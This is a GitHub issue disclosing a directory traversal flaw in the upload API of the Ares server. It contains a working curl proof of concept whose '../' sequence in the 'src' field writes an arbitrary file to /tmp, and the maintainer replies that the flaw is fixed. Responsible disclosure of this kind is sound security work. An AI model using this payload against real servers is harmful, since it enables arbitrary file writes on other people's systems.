File upload directory traversal

[justinsteven]

The upload API allows for creation of files on disk in arbitrary locations with arbitrary content.

https://github.com/sweetsoftware/Ares/blob/140c05f83d18af85efb5258530016f83674c5e55/server/server.py#L93-L109

% curl -v -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1058259938' --data-binary $'----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"botid\"\x0d\x0a\x0d\x0a1\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"src\"\x0d\x0a\x0d\x0a../../../../../../../../tmp/traversal\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"uploaded\"; filename=\"uploaded\"\x0d\x0a\x0d\x0awin\x0d\x0a----------1058259938--\x0d\x0a' http://172.17.24.130:8080/api/upload
* Hostname was NOT found in DNS cache
*   Trying 172.17.24.130...
* Connected to 172.17.24.130 (172.17.24.130) port 8080 (#0)
> POST /api/upload HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 172.17.24.130:8080
> Accept: */*
> Content-Type: multipart/form-data; boundary=--------1058259938
> Content-Length: 303
> 
* upload completely sent off: 303 out of 303 bytes
< HTTP/1.1 200 OK
< Date: Sun, 13 Dec 2015 07:16:29 GMT
< Content-Length: 125
< Content-Type: text/html;charset=utf-8
* Server CherryPy/3.5.0 is not blacklisted
< Server: CherryPy/3.5.0
< 
* Connection #0 to host 172.17.24.130 left intact
Uploaded: <a href="../uploads/1/../../../../../../../../tmp/traversal">../uploads/1/../../../../../../../../tmp/traversal</a>

% cat /tmp/traversal
win

[sweetsoftware]

Hello @justinsteven,

Thanks a lot for your feedback ! I just fixed this along with the botid form field, which was also injectable.